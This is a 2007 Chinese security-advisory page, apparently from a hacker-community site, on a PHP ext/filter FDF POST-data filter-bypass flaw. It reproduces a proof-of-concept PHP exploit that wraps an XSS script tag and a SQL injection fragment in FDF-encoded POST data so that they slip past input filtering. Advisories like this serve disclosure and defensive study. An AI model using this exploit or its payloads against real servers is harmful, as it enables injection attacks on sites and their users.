文章 | 入侵攻击 | 安全防御 | 电脑知识 | 建站技术 | 网络编程 | 网络知识 | 工具使用 | 新闻资讯 | 安全公告

下载 | 漏洞扫描 | 加密破解 | 入侵攻击 | 后门木马 | 溢出程序 | 综合工具 | 安全防护 | 原创作品 | 动画教程

论坛 | 黑客军火 | 配服务器 | 黑客情感 | 免费资源 | 被黑网站 | 美女贴图 | 会员照片 | 在线服务 | 网站首页

  当前位置:主页 > 安全公告 > 漏洞公告 > 文章内容   您对新版的建议

PHP ext/filter FDF Post数据过滤绕过漏洞

www.hx99.org 阅读: 时间:2007-07-09 整理:华西黑盟
------------------------------------------------------------------
 受影响系统:
PHPPHP<=5.2.0
描述:
BUGTRAQ  ID:

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP新实现的ext/filterFDF扩展实现上存在漏洞,远程攻击者可能利用此绕过用户数据过滤,从而在服务器上执行各种注入攻击。

根据设计,PHP的内容过滤钩子会在所有解析用户输入并注册为变量的地方添加对输入过滤器的调用,以确定如何处理这些变量,但添加对其他POST内容类型支持的所有扩展也需要实现钩子,否则数据就会绕过过滤。如果安装了ext/fdf的话PHP就会捆绑一个对FDFPOST数据格式的扩展,但没有调用输入过滤器,因此攻击者就可能绕过所强制的过滤机制,获得非授权访问。

<*来源:StefanEsser(
  
  链接:
*>

测试方法:
警告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                    _      ___  _  _  ___  //
  //||||___  __  __||___  __  ___  __||___|_\|||||_\//
  //|__|/_`||'_|/_`|/-_)|'\/-_)/_`||___||  _/|__||  _///
  //|_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|    |_|  |_||_||_|  //
  //                                                                    //
  //        ProofofconceptcodefromtheHardened-PHPProject        //
  //                  (C)Copyright2007StefanEsser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //            PHPext/filterFDFPOSTFilterBybassExploit          //
  ////////////////////////////////////////////////////////////////////////

  //Thisismeantasaprotectionagainstremotefileinclusion.
  die("REMOVETHISLINE");

  //_POSTisthearraythatwillbesenttotheurlin$url
  $_POST=array();
  $_POST['var1']="<script>alert(/XSS/);</script>";
  $_POST['var2']="'UNIONSELECT";

  $url="
  
  //Youdonotneedtochangeanythingbelowthis
  
  $outfdf=fdf_create();
  foreach($_POSTas$key=>$value){
    fdf_set_value($outfdf,$key,$value,0);
  }
  fdf_save($outfdf,"outtest.fdf");
  fdf_close($outfdf);
  
  $ret=file_get_contents("outtest.fdf");
  unlink("outtest.fdf");
  
  $params=array('http'=>array(
      'method'=>'POST',
      'content'=>$ret,
      'header'=>'Content-Type:application/vnd.fdf'
  ));
  
  $ctx=stream_context_create($params);
  $fp=@fopen($url,'rb',false,$ctx);
  if(!$fp){
    die("Cannotopen$url");
  }
  $response=@stream_get_contents($fp);

  echo$response;
  echo"\n";
?>

建议:
厂商补丁:

PHP
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
   ---------------------------------------------------------------------------------------------------
  上一篇:DedeCMS最新版存在暴物理地址BUG
  下一篇:PHP ext/filter HTML标签去除绕过漏洞
   ---------------------------------------------------------------------------------------------------
用户名:
Email:
评论内容:
 
  精品推荐
IE 6 被发现严重漏洞
微软严重漏洞 使全部图片
MS08-067漏洞模拟攻击原型
趋势科技:2008年上半年威
Adobe官网爆SQL注入漏洞
微软破例紧急公布严重漏洞
雅虎招聘网存跨站脚本攻击
微软预警:ActiveX再度引来
Google手机上市即曝严重漏
2008年上半年安全研究报告
多家防病毒公司预警微软图
雅虎HotJobs网站发现跨站
Firefox3存重大漏洞 可致D
微软12月安全公告:含8个重
公布漏洞:多款RSS阅读器
关于我们 | 发展历程 | 在线投稿 | 核心监督 | 友情链接 | 网站地图 | 网站留言 | 联系我们
Copyright © 2004-2009 Www.Hx99.Net
版本:华西黑盟网站系统V6.0 Email:root#hx99.org
中国·西安·宝鸡 请使用IE6.0版本, 分辩率1024×768进行浏览
版权所有 任意抄袭 注意完整
陕ICP备06000444号